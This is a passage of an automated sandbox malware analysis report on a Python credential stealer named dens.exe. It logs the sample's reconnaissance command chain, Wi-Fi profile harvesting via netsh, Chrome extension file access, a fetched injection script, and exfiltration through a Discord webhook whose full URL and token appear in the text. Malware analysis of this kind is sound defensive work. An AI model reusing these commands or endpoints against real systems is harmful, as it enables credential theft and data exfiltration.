C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\dens.exe", ParentImage: C:\Users\user\Desktop\dens.exe, ParentProcessId: 6500, ParentProcessName: dens.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user admin
            Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7256, ProcessName: svchost.exe

            Stealing of Sensitive Information

            Source: Process started, Author: Joe Security, Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\dens.exe", ParentImage: C:\Users\user\Desktop\dens.exe, ParentProcessId: 6500, ParentProcessName: dens.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", ProcessId: 3488, ProcessName: cmd.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-11-13T00:38:46.672880+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.4 | 49744 | TCP
            2024-11-13T00:39:26.467794+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.4 | 49763 | TCP
            2024-11-13T00:38:58.408138+0100 | 2857287 | 1 | A Network Trojan was detected | 185.199.108.133 | 443 | 192.168.2.4 | 49757 | TCP


            AV Detection

            Source: C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe, ReversingLabs: Detection: 39%
            Source: dens.exe, ReversingLabs: Detection: 39%
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 89.8% probability

            Phishing

            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exe, Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Users\user\Desktop\dens.exe, File created: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt
            Source: C:\Users\user\Desktop\dens.exe, File created: C:\Users\user\AppData\Local\Temp\_MEI62482\wheel-0.43.0.dist-info\LICENSE.txt
            Source: dens.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

            Spreading

            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Users\user\Desktop\dens.exe, Code function: 0_2_00007FF62C0F9280 FindFirstFileExW,FindClose,0_2_00007FF62C0F9280
            Source: C:\Users\user\Desktop\dens.exe, Code function: 0_2_00007FF62C0F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF62C0F83C0
            Source: C:\Users\user\Desktop\dens.exe, Code function: 0_2_00007FF62C111874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF62C111874
            Source: C:\Users\user\Desktop\dens.exe, Code function: 1_2_00007FF62C0F9280 FindFirstFileExW,FindClose,1_2_00007FF62C0F9280
            Source: C:\Users\user\Desktop\dens.exe, Code function: 1_2_00007FF62C111874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF62C111874
            Source: C:\Users\user\Desktop\dens.exe, Code function: 1_2_00007FF62C0F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF62C0F83C0
            Source: C:\Users\user\Desktop\dens.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
            Source: C:\Users\user\Desktop\dens.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
            Source: C:\Users\user\Desktop\dens.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
            Source: C:\Users\user\Desktop\dens.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
            Source: C:\Users\user\Desktop\dens.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
            Source: C:\Users\user\Desktop\dens.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

            Networking

            Source: Network trafficSuricata IDS: 2857287 - Severity 1 - ETPRO MALWARE Python Cstealer/SatanStealer Discord JS Inject Inbound : 185.199.108.133:443 -> 192.168.2.4:49757
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: unknownDNS query: name: ip-api.com
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49744
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49763
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic HTTP traffic detected: GET /antivirusevasion23/injection/main/injection.js HTTP/1.1 Host: raw.githubusercontent.com Accept: */* Accept-Encoding: gzip, deflate, br User-Agent: Python/3.12 aiohttp/3.10.5
            Source: global traffic HTTP traffic detected: GET /getServer HTTP/1.1 Host: api.gofile.io Accept: */* Accept-Encoding: gzip, deflate, br User-Agent: Python/3.12 aiohttp/3.10.5
            Source: global traffic HTTP traffic detected: GET /json HTTP/1.1 Host: ip-api.com Accept: */* Accept-Encoding: gzip, deflate, br User-Agent: Python/3.12 aiohttp/3.10.5
            Source: global traffic DNS traffic detected: DNS query: ip-api.com
            Source: global traffic DNS traffic detected: DNS query: discord.com
            Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
            Source: global traffic DNS traffic detected: DNS query: api.gofile.io
            Source: global traffic DNS traffic detected: DNS query: store1.gofile.io
            Source: unknown HTTP traffic detected: POST /api/webhooks/1295868334612418591/QuvcFisisSeqgiaaEigFghTgy3B5fdld_JRxA14GVrqmyygbrLTztN99jPEX8IcFYc7T HTTP/1.1 Host: discord.com Content-Type: application/json Accept: */* Accept-Encoding: gzip, deflate, br User-Agent: Python/3.12 aiohttp/3.10.5 Content-Length: 1311
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 23:38:54 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1731454736x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E828AVbhGugyqVGLPhmHBb5U4Fg1xGA6Tk2O23S2an1hba95j8VNgqPPFdzhBzB1d3ATG1%2Fpf8QHWFwhMOB1zjvKfP2JKvm%2B1Ku3ylPkM4ERbQzOmOnBttRRLJLI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=b4fe6e672b6a1d8dbc1bc903c4e4d946e08efe60-1731454734; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=jksrHuwgi48AtT.0Eupf2voBCFAB43FLFLVhTeE9FnI-1731454734658-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e1a5bbb3d6d3583-DFW
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 23:38:55 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1731454736x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4JODxRD7CJ9x5uuyA3G0YfusieZaBpUO4%2BbqOIWjAapORqiek10j8s%2FcLVW1hLrP7YtPoEgK4iVRpVb4cf2bHgmLteop%2F3XbRb%2BSTqMCJqRrJtjH8PLOuUd5XJzj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=9dba5449c019f2fb2e6b326e2136aa66df548017-1731454735; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=cKhzjvou17nQeUzv5Xf8o9mP4iIFwtHtb226JZIYU7k-1731454735463-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e1a5bc03bbc2cd2-DFW
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 23:38:57 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1731454738x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PXwzgwwbEGRs1xEifo4GwpCxmbqG7m%2F1ZIUpQCJYe0HNKbi07rOlEItVnZCnTm31pRqOTdvgr1dg0kq0sAUYnBcBDjc3bA2WrJcC5U5Mn0GzVCAq71rsrSmEL9CN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Server: cloudflareCF-RAY: 8e1a5bc5abe93160-DFW
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.1Date: Tue, 12 Nov 2024 23:39:01 GMTContent-Type: text/html; charset=utf-8Content-Length: 14Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-Type, AuthorizationAccess-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEADAccess-Control-Allow-Credentials: trueContent-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requestsCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: cross-originOrigin-Agent-Cluster: ?1Referrer-Policy: no-referrerStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-DNS-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 0ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 23:39:04 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1731454746x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ulokEnWGzVdH7hLe7hM6A2vOqkNcE0KE1y65WVc8ZvDwIjhqZcZpQbKPvQF8sheBErrWD8hb%2BJuFHZ01kC0lCIIzTD16gbov3KB0pVTsuTd6CvzTlRvcpVS1Jqp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=61c4ad02f8e425b2213084f6302794d3bd4541dd-1731454744; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=tkSDV4PM1uOJpB7hv3ajc8RXfDe2eEs5RpUxYl09GBk-1731454744647-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e1a5bf99b60d5db-DFW
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 
00000000.00000003.1690034883.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD6D000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 
00000000.00000003.1690034883.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 
00000000.00000003.1690034883.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD6D000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663289848.00000107DAD6F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 
00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: dens.exe, 00000001.00000003.2042664984.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2044813767.000002D9AADEC000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703441544.000002D9AADC0000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2056068018.000002D9AADC6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2047151959.000002D9AADC1000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703254242.000002D9AADB9000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2044627162.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039084149.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2050122173.000002D9AADC2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040864660.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039859652.000002D9AADEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
            Source: dens.exe, 00000001.00000003.1701312245.000002D9AB206000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1701110182.000002D9AB2D7000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041072267.000002D9AB1FB000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1701110182.000002D9AB280000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703029573.000002D9AB206000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2051625199.000002D9AB22B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060725211.000002D9AB22B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1701276433.000002D9AB2D7000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2046658607.000002D9AB227000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2043275483.000002D9AB205000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2050345142.000002D9AB22A000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039709379.000002D9AB1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
            Source: powershell.exe, 00000052.00000002.1892090053.00000217AB814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: svchost.exe, 00000034.00000002.2911368637.000001DE8AEBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663289848.00000107DAD6F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 
00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD6D000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 